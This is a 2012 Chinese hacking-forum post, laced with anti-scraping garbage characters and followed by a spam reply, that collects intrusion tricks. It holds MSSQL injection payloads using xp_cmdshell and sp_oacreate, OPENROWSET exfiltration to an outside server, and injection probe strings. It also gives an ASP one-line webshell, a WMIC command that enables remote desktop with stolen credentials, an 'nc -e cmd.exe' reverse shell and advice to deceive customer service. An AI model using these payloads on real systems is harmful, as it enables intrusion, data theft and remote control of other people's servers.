找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3393|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
SA点数据库分离技术相关
7 C, e+ u3 R1 s7 q3 M0 D
5 d$ c7 z8 h4 ~8 B6 T1 T2 b0 y  r
9 O2 ?4 E* i7 ?SA点数据库分离搞法+语句:1 D/ b- @( t$ K$ `6 B, e: ?
7 z2 R  A% Y; D
注射点不显错,执行下面三条语句页面都返回正常。
$ F: _; t+ U# dand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
, V% X1 d  Q& i1 i) S+ ^3 a8 E, e$ kand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
  l6 Y  K( t+ D, t1 X! Q3 iand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
8 s8 X" k. P# A# q) ?可以列目录,判断系统为2000,web与数据库分离
& F7 C& c; r8 I9 A遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
" u+ z) p0 p* t% T8 ?0 Z* _在注射点上执行
  y: V9 g: z. S4 t* E- cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--: L( T- }5 _: n1 A; F+ L/ V
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
' x3 f5 O) U/ j( M1 v3 ~还有我用NC监听得其他端口都没有得到IP。
2 b6 A6 E6 \# J/ M! @! G! @
# ]6 t' R6 Q: y# O% [1 t通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。) Z, |1 O1 e" Y1 b% w
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
' z/ {) p2 L& I8 y3 t, z& e# H. e8 b4 I1 N, c
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
. D- W3 m" S0 b0 T2 R+ n
; r( {; P- ^8 P' p4 x现在就猜想是不是数据库是内网而且不能连外网。
! k3 x  H9 P0 \3 h9 w  ]3 k# s; D* N
* j; D" H/ A9 @% ^/ M/ K& O; [4 ^  v  }+ ~& o7 S& @; [  U* ]
access导出txt文本代码
7 n2 t8 @& ]/ o+ a+ vSELECT * into [test.txt] in 'd:\web\' 'text;' from admin9 o. t$ ?% w+ V3 `& C

* N3 u* V8 _1 D# ]9 T" v" V. U1 @7 [( J; q  J7 Q+ x

; h& M- d6 _/ M. F自动跳转到指定网站代码头3 |+ w) ~  x$ Y
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>- L+ s$ c7 Q, @! j2 ^

2 k: P, P  d1 N% S7 D, b* j  T9 }' l1 q' Q& m) B9 K* W
入侵java or jsp站点时默认配置文件路径:
+ c2 P! g& t8 H: o\web-inf\web.xml7 f, X& d/ ^8 \: |; {
tomcat下的配置文件位置:
6 W: N2 r5 D% u. l\conf\server.xml            (前面加上tomcat路径)# V% Y3 `( |  J: q3 C( D
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml% p3 A$ u6 V: c" e1 b
3 G' c. i; J9 A: f7 M. x% ^/ C7 _
" p; X7 o* f; d6 I' k

( F9 G! U/ J3 z' L3 F: ]- x, R检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
8 h" ]- n5 K: Y4 a( _0 f# E6 R" I% g-1%232 r9 m) G7 h3 j7 s7 Q
> 5 j3 F, a9 \( l: b3 u0 X/ p
<
) x) a4 z% \6 y- T+ M  P3 d( }! l1'+or+'1'='1
$ K9 |4 J+ B4 S5 v% \7 F3 Wid=8%bf
$ i. J% U! t/ H( [9 a
' l' `4 W3 e. O5 o全新注入点检测试法:
+ o5 |& {1 ~7 Q( d在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
* p2 I  M8 M0 Z+ K' e# L) Y; c$ z
5 q7 T, f  r, z) x' w% s$ d在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
) e9 ~3 i5 I3 l# F: C0 Z* B* H: O& ?- A! e# u
搜索型注入判断方法:1 q4 o& x+ i& ?  Q# h" l% r
北京%' and '1'='1' and '%'='. A* w% I5 r" U0 a/ N5 Q
北京%' and '1'='2' and '%'='
  R/ t# `/ q6 |* c5 r
) {: s: p- }$ z' U. `% p
1 m4 W# K) ?* `0 VCOOKIES注入:9 _2 m) y" t1 j

) {. ]$ s! }+ `! Z1 T3 f* tjavascript:alert(document.cookie="id="+escape("51 and 1=1"));! i* |. g! Q1 i( G

4 U) |: X+ Q. n9 k7 s$ c* x# `8 T( W+ F2000专业版查看本地登录用户命令:
, U8 U% b' W7 r; X; a! P" [1 Cnet config workstation
1 ^: b+ g( t# r& y2 o8 |2 U* i1 K4 Z% I

* E$ l$ _8 ?: B) D' B: e$ p2003下查看ipsec配置和默认防火墙配置命令:8 n) T+ A1 ~! g0 N; w
netsh firewall show config% h3 x& v, p  K  m
netsh ipsec static show all
( G3 \3 c1 g* l$ o/ s, T5 e
5 W+ L" T6 v) }不指派指定策略命令:
' {" B& Z! I/ T) Q9 pnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)8 j6 @& F# M2 _! `
netsh ipsec static show policy all  显示策略名
+ Q1 G+ A# p( U  H  w0 }( f* J* M! F& s& S5 o5 k' }
' d: l: W, m7 Q
猜管理员后台小技巧:2 R8 O. C3 N8 g: ~
admin/left.asp
' w( h$ E1 o7 G  K0 N4 k# zadmin/main.asp
7 f7 L, P2 j5 q7 ^admin/top.asp/ \5 O# s# I. V
admin/admin.asp 6 n1 g: I% a; J
会现出菜单导航,然后迅雷下载全部链接6 k4 T. D0 Z; t

* _6 O- q9 l' Z$ B/ ^: S5 a9 c/ N8 j
社会工程学:# V( S( N1 `7 Y: E$ w9 W6 J. R
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人1 a  N, ?, g$ ]6 Z8 h  t, g) x
然后去骗客服
9 m, C  F* j4 n; `* P, n5 U' a9 N2 a4 C" @) o

3 ]+ _7 n  R' O+ O6 z; }统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 1 i  }3 b3 O* q( f) b( W$ @' p
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
: u7 y$ ~" O5 J8 R  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。- M2 _( D; D! A+ @+ P4 i

0 J- t8 n0 M7 b: Q8 j! i
: I8 ~6 Z+ h: Y% Q, G5 Y. M, r+ q; g/ j
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)8 @' B$ ^- ?9 f. ~% T. k* ]; n
8 a& `) C6 k% ?, k& R  o' ]

7 H3 h; t- r6 E5 S( D
: a% N! C0 d; e8 V3 c4 X, ]% m/ VCMD加密注册表位置1 a6 n: [! ?& @0 ?% i4 [
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
0 `5 ~/ |  T5 l# R. q% C* k( ^AutoRun  x1 g' e6 L* o- g  f

  B1 H% J1 b' p(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
9 c# G% c- C/ S$ AAutoRun
/ U) e  z, h8 S7 T6 @% e( b& H9 X

- z+ S1 ~7 z( |$ }' a$ T* b7 e在找注入时搜索Hidden,把他改成test
0 _- `. d+ B' ^8 f) o5 t; O
2 c2 G9 Z+ e/ S/ M; B6 i& r% m
5 E7 A: j( v. l# p, Y1 z' i% v* h" L! O+ G6 \' g; }& p
mstsc /v:IP /console # F  u6 @' g# c5 H8 g1 o

3 y6 ]+ b6 h4 B/ `9 h- S$ m/ f7 ~4 O, t1 ], u' m
一句话开3389:& @( Q2 K4 w3 r' n3 }
7 w9 l/ ?3 s3 U; p
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
) Z6 D  f" w! y5 T. W. m8 k开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.) X* D5 P, J1 m9 p

% I, R2 \* B0 r9 _3 ^4 {! f% U! x: e$ u7 r1 B% K/ R
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
1 `; w3 q5 ]1 T. t; G. ^2 L) f: ^Insert into admin(user,pwd) values('test','test')4 l* c- F! R% F- b; z! _
& I- m3 Z5 x# @

) j% f: U. K3 Z! Z- FNC反弹5 O8 |  R' N9 `$ k% I, b
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
! J' H* Y3 N) z. y然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
6 H/ p  }* p  g# ]6 d' {0 I: w" l% l7 L: [2 |' O/ Z/ Y: e5 z

0 M) Z5 O& ~" x在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
) P: w9 K# t% v* x: n
1 s  m6 q# Q% z7 o+ X有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录8 y. j+ s7 E8 ]  G1 S4 ~
例如:
8 o) o2 S8 n  |. ^# ]9 b+ Hsubst k: d:\www\ 用d盘www目录替代k盘  Z+ [* S1 v* n. R" c' f
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表